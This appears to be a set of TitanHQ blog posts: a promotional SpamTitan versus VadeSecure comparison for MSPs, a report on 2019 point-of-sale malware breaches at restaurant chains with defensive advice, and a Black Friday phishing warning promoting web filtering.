At face value, SpamTitan and VadeSecure may appear to be equivalent products. In this post we offer a comparison of SpamTitan and VadeSecure to help managed service providers (MSPs) differentiate between the two solutions.
SpamTitan and VadeSecure
SpamTitan and VadeSecure are two email security solutions that block productivity-draining spam emails, phishing emails, and malspam – spam emails that deliver malware or malware downloaders. These cloud-based solutions assess all incoming emails and determine whether they are genuine communications, unwanted spam, or malicious messages and deal with them accordingly to prevent employees from opening the messages.
TitanHQ is the leading provider of cloud-based email and web security solutions for MSPs that serve the SMB market and has been providing email security for MSPs for more than 2 decades. SpamTitan is TitanHQ’s email security offering, which has been developed for SMBs and MSPs that serve the SMB market.
VadeSecure is a French company that has developed an email security solution for the SMB market. As is the case with SpamTitan, VadeSecure offers protection from email-based threats and provides an important extra layer of security, especially for Office 365 environments. The company is now venturing into the MSP market and has recently raised an additional $79 million in venture capital to help it make inroads into the MSP market. However, at present, the solution is primarily geared toward SMBs rather than MSPs that serve them.
Enhanced Phishing Protection for Office 365 Accounts
Office 365 is the most widely used cloud service by user count and 2019 figures show that Office 365 cloud services are used by 1 in 5 corporate employees, with Office 365 email being the most common. With so many businesses using Office 365 for email, it should come as no surprise that Office 365 email accounts are being heavily targeted by hackers and scammers.
Microsoft does have measures in place to block spam and phishing emails, but the level of protection provided by Exchange Online Protection (EOP) is not sufficient for many businesses. A large percentage of phishing emails manage to sneak past Microsoft’s defenses. According to research from Avanan, 25% of phishing emails are delivered to Office 365 inboxes.
Consequently, additional protection is required, and many businesses choose to implement an anti-phishing solution provided by third parties such as SpamTitan and VadeSecure. MSPs also offer third party solutions to block phishing attacks on Office 365 accounts, not only to better protect their customers, but also to reduce the amount of time they spend mitigating phishing attacks that have not been blocked by EOP.
SpamTitan and VadeSecure have been developed to work on top of Office 365 and add an important extra layer of protection for Office 365 email.
Here we will concentrate on a comparison of SpamTitan and VadeSecure with a specific focus on the features and benefits for MSPs rather than SMBs.
Comparison of SpamTitan and VadeSecure for MSPs Serving the SMB Market
Since VadeSecure has historically focused on the Telco market, the email security solution lacks many features to make MSP’s lives easier and does not provide the level of control, flexibility, or the management tools and reports that MSPs seek. SpamTitan has been developed by MSPs for MSPs, so important features for MSPs have always been offered. We will cover these features below, but initially it is useful to include an infographic that summarizes some of the basic features of SpamTitan and VadeSecure for comparison purposes.
Basic Features of SpamTitan and VadeSecure
SpamTitan Features for MSPs Not Offered by VadeSecure
This comparison of SpamTitan and VadeSecure may seem a little one-sided, and that is because VadeSecure is very much focused on end users rather than MSPs. No doubt the solution will be updated to incorporate more MSP-friendly features over time as the company tries to move into the MSP market, but at present, the features below are provided by SpamTitan but are not offered by VadeSecure.
Configuration Flexibility and Customization Potential
One of the biggest bug bears with VadeSecure is the inability to configure the solution to suit the needs of MSPs. It is not possible to create custom rules for instance, and MSPs must therefore use the Exchange Admin functionality of Office 365.
With SpamTitan, MSPs can create rules based on their own requirements and the needs of each individual client, and those rules can be highly granular and can easily be applied to specific groups, users, and for specific domains. That level of granularity and the ease of customization allows MSPs to fine-tune filtering policies to maximize the detection of threats while minimizing false negatives. MSPs can easily select more permissible or more aggressive policies for each client, but with VadeSecure there is no option for customization for each customer.
SpamTitan includes a full multi-tenancy view of all customers, with multiple management roles. This allows MSPs to easily monitor their entire customer base and trial base, assess the health of the deployments, view activity volumes across all customers, and quickly identify issues that require attention. With VadeSecure, there is no possibility of integrating with PSAs and RMMs, and there is no customer-wide view of the entire system.
Highly Granular Reporting
MSPs can tell their clients how important it is to improve their security defenses, but they must also be able to demonstrate that the solutions are proving effective at blocking threats to ensure they can continue to provide those services and receive regular, repeating revenue.
With SpamTitan, MSPs have highly granular reports that give them full visibility into what is happening and a detailed view of system performance. Client reports can easily be generated to show them how effective the solution is and why it is important to keep it in place. Furthermore, this level of reporting – per domain, per group, and at the group domain level – gives MSPs the information they need to identify potential issues and obtain detailed information on spam emails. The solution also has the management capabilities to allow any issues to be quickly identified and corrected to ensure the solution remains effective over time. With VadeSecure, visibility and control options are lacking and there are no options for demonstrating how effective the solution is and to demonstrate that to clients.
High Margins and Significant Revenue Potential
As previously mentioned, the flexibility and scope for customization is a real benefit for MSPs as it allows them to add more value through superior management capabilities. That means MSPs can build solutions that really benefit their clients and it helps them become more of a strategic partner rather than an IT service provider. It is much harder for clients to change a strategic partner than switch IT service providers. VadeSecure lacks this customization which means it is not possible for MSPs to add value to generate reliable, recurring revenue.
Further, with VadeSecure you get one product, but TitanHQ offers a trio of solutions for MSPs to better protect their clients and add more recurring revenue streams. Through the TitanShield for Service Providers program, MSPs also have access to WebTitan DNS filtering and ArcTitan email archiving. This allows MSPs to maximize revenue from each client by cross-selling new services, while also offering a layered security package to protect clients from the full range of email- and web-based threats.
Fully Transparent Pricing
When it comes to pricing, VadeSecure (and many other email security solutions) lack transparency and the pricing model is complex and expensive. Several features are not included as standard with VadeSecure and come at an additional cost. This makes it hard to perform a SpamTitan and VadeSecure pricing comparison.
For instance, with VadeSecure the solution is priced per module, so the Greymail, Spam, and Virus Protection options are not provided as standard and have to be added onto the cost. Based on feedback we have received from MSPs the solution is expensive, which reduces MSP profits and makes the email security solution more difficult to sell to SMBs.
With VadeSecure, the total number of users is not aggregated, which shows a lack of experience of working with MSPs. An MSP with 100 x 10-seat licenses will have that pay at 10 seats each rather than 1,000 seats overall. As such, discounts will be far lower.
With SpamTitan there is just one price which includes all features, including sandboxing, full support, dual anti-virus protection, all security modules, and updates. Furthermore, the price is exceptionally competitive (less than $1 per user). The pricing model was created to incorporate the flexibility for dealing with fluctuating numbers of customers, which often happens when providing managed email services.
Effectiveness at Blocking Threats
Price, usability, and flexibility are all important for MSPs, but features and benefits are the icing on the cake. Email security solutions are used to protect against threats, so the effectiveness of a solution is critical. SpamTitan and VadeSecure are effective at blocking threats and will provide an important additional layer of security for Office 365 users, but feedback we have received from MSPs show there is a clear winner.
VadeSecure includes ‘time-of-click’ protection against embedded hyperlinks, which rewrites URLs and sends them to a scanner. However, MSPs have reported that it can take a long time for phishing emails to be detected, even after threats would be blocked by Chrome. That means that phishing emails are being delivered and there is a window during which a successful attack could occur. This URL click feature only appears to work in OWA or the Outlook client as it is an API integration with Office 365.
SpamTitan includes more advanced detection methods to ensure that malicious URLs are detected and phishing emails are filtered out. SpamTitan includes SURBL filtering and other malicious URL detection mechanisms that complement the default mechanisms in Office 365 such as Recipient Verification Protocols, Sender Policy Frameworks, and Content Filter Agents. This means end users are better protected and there is a much lower probability of a phishing email evading detection.
Dual anti-virus protection is also provided and SpamTitan features a sandbox where suspicious attachments can be safely analyzed for malicious actions. This provides superior protection against malware, ransomware, and zero-day threats that are not detected by the two AV engines.
Any business that processes card payments is a target for cybercriminals, but restaurants in particular are favored by hackers. Over the past few weeks, cybercriminals have stepped up their efforts to attack these businesses and several restaurant chains have had their systems compromised. In all cases, malware has been installed on point-of-sale systems that steals payment card information when diners pay for their meals.
Many of the attacks have hit restaurant chains in the Midwest and East, with credit card data from diners recently having been listed for sale on the underground marketplace, Joker’s Stash. A batch of approximately 4 million credit and debit cards is being offered for sale, which comes from malware attacks at Moe’s, McAlister’s Deli, Krystal, and Schlotzsky’s.
The cyberattack on Krystal was detected in November, with the other three chains, all owned by Focus Brands, attacked in August. In total, the above chains have more than 1,750 restaurants and almost half of those locations, mostly in Alabama, Florida, Georgia and North and South Carolina, were affected.
Catch Hospitality Group also announced in November that it had suffered a cyberattack which had seen malware installed on its point-of-sale system that scraped and exfiltrated payment card data as diners paid for their meals. The data breach affected customers of Catch NYC, Catch Roof, and Catch Steak restaurants. Fortunately, the devices used to process the majority of payments were unaffected. Malware was on the Catch NYC and Catch Roof devices between March 2019 and October 2019, with Catch Steak affected between September 2019 and October 2019.
Church’s Chicken restaurants were also attacked in a separate incident in October. The majority of its 1,000+ restaurants were not affected, but at least 160 restaurants in Alabama, Arkansas, Florida, Georgia, Illinois, Louisiana, Mississippi, Missouri, South Carolina, Tennessee and Texas had malware installed on their POS system.
Other restaurant chains that have been attacked in 2019 include Checker’s Drive-In, Cheddar’s Scratch Kitchen, Huddle House, Applebee’s, Chilli’s, and Earl Enterprises (Buca di Beppo, Chicken Guy, Tequila Taqueria, Mixology, Planet Hollywood). Malware n the systems of Earl Enterprises had been present for almost a year before it was detected.
How to Improve Restaurant Cybersecurity
Restaurants process many thousands of card transactions which makes them an attractive target for hackers. Restaurants often use out-of-date operating systems, have vulnerability-ridden legacy hardware, and their cybersecurity solutions often leave a lot to be desired. Consequently, cyberattacks on restaurants are relatively easy to perform, at least compared to many other types of businesses.
In order to infect the POS system, the attackers will need network access. That is most commonly gained via phishing emails, drive-by malware downloads, or by abusing remote access tools. Direct attacks are also possible using techniques such as SQL injection and weak passwords can be easily guessed using brute force tactics.
The malware that sits on systems and exfiltrates data tends to have a very small footprint and is often stealthy as it needs to be present for long periods of time to collect payment card data. That can make it hard to detect when it has been installed. The key to security is therefore improving defenses to make sure the malware is not installed in the first place, which means preventing the attackers from gaining access to the network.
Listed below are some easy-to-implement steps that will help restaurants improve their security posture and block attacks. The key is defense in depth through layered security.
Use an enterprise-grade firewall –Ensure an enterprise-grade firewall is purchased. A firewall will prevent unauthorized individuals from gaining access to your network resources.
Patch promptly and update all software and firmware – Ensure patches are applied promptly and software and firmware updates are implemented when they are released. That includes all systems and networked devices, not just your POS.
Upgrade hardware – When your hardware is approaching end of life it is time to upgrade. Unsupported hardware (and software) will no longer be updated and vulnerabilities will no longer be fixed.
Lockdown your POS: Use whitelisting or otherwise lock down POS systems to make it harder for malware to operate. Only allow trusted apps to run on your POS systems.
Install powerful antivirus software – Ensure all devices are protected by a powerful anti-virus solution and that it is set to update virus definitions automatically. Regularly scan the network for malware, especially your POS.
Implement an intrusion detection system – These systems monitor the network for unusual activity that could indicate a malware infection, attackers searching the network for the POS system, and unusual traffic that could indicate data exfiltration.
Change all default passwords and set strong passwords – To protect against brute force attacks, ensure strong passwords are set on all systems and all default passwords are changed. Also implement rate limiting to block attempts to access a system or device after a set number of failed password attempts.
Implement a powerful spam filtering solution – A powerful email security solution, such as SpamTitan, is required to prevent spam and malicious emails from being delivered to end users. Even if you have Office 365, you will need a third-party email security solution to block email-based threats.
Restrict Internet access with a DNS filter – A DNS filter such as WebTitan provides protection against drive-by malware downloads and web-based phishing attacks. WebTitan will block all known malicious websites and those with a low trust score. The solution can also be configured to prevent employees from accessing categories of websites where malware downloads are more likely.
Disable Remote Access if Possible – Disable Remote Desktop Protocol and all remote access tools. If remote access tools are required to allow essential maintenance work to be completed, ensure they can only used via a VPN and restrict the people who can use those tools.
Black Friday phishing scam are rife this year. With almost a week to go before the big discounts are offered by online retailers, scammers are stepping up their efforts to defraud consumers.
Spam email campaigns started well ahead of Black Friday this year and the scams have been plentiful and diverse. Black Friday phishing emails are being sent that link to newly created websites that have been set up with the sole purpose of defrauding consumers or spreading malware and ransomware. It may be a great time of year to pick up a bargain, but it is also the time of year to be scammed and be infected with malware.
A wide range of spam emails and scam websites have been detected over the past few weeks, all of which prey on shoppers keen to pick up a bargain. This year has seen the usual collection of almost too-good-to-be-true offers on top brands and the hottest products, free gift cards, money off coupons, and naturally there are plenty of prize draws.
Anyone heading online over the next few days to kick start their holiday shopping spree needs to beware. The scammers are ready and waiting to take advantage. With legitimate offers from retailers, speed is of the essence. There is a limited supply of products available at a discount and shoppers are well aware that they need to act fast to secure a bargain. The scammers are playing the same game and are offering limited time deals to get email recipients to act quickly without thinking, to avoid missing out on an exceptional deal.
This time of year always sees a major uptick in spam and scams, but this year has seen much more sophisticated scams conducted than in previous years. Not only are the scammers insisting on a quick response, several campaigns have been identified that get users to help snag more victims. In order to qualify for special offers or get more deals, the scammers require users to forward messages and share social media posts with their friends and contacts. This tactic is highly effective, as people are more likely to respond to a message or post from a friend.
So how active are the scammers in the run up to Black Friday and Cyber Monday? According to an analysis by Check Point, the number of e-commerce phishing URLs has increased by 233% in November. Those URLs are being sent out in mass spam campaigns to direct people fake e-commerce sites that impersonate big name brands. Those sites are virtual carbon copies of the legitimate sites, with the exception of the URL.
While consumers must be wary of Black Friday phishing scams and potential malware and ransomware downloads, businesses should also be on high alert. With genuine offers coming and going at great speed, employees are likely to be venturing online during working hours to bag a bargain. That could easily result in a costly malware or ransomware infection.
The scams are not limited to the run up to Black Friday. Cyber Monday scams can be expected and as holiday season fast approaches, cybercriminals remain highly active. It’s a time of year when it pays to increase your spam protections, monitor your reports more carefully, and alert your employees to the threats. A warning email to employees about the risks of holiday season phishing scams and malicious websites could well help to prevent a costly data breach or malware infection.
Its also a time of year when a web filtering solution can pay dividends. Web filters prevent employees from visiting websites hosting exploit kits, phishing kits, and other known malicious sites. They can also be configured to block downloads of malicious files. A web filter is an important extra layer to add to your phishing defenses and protect against web-based attacks.
If you have yet to implement a web filter, now is the ideal time. TitanHQ is offering a free trial of WebTitan to let you see just how effective it I at blocking web-based threats. What’s more, you can implement the solution in a matter of minutes and get near instant protection from web-based phishing attacks and holiday season malware infections.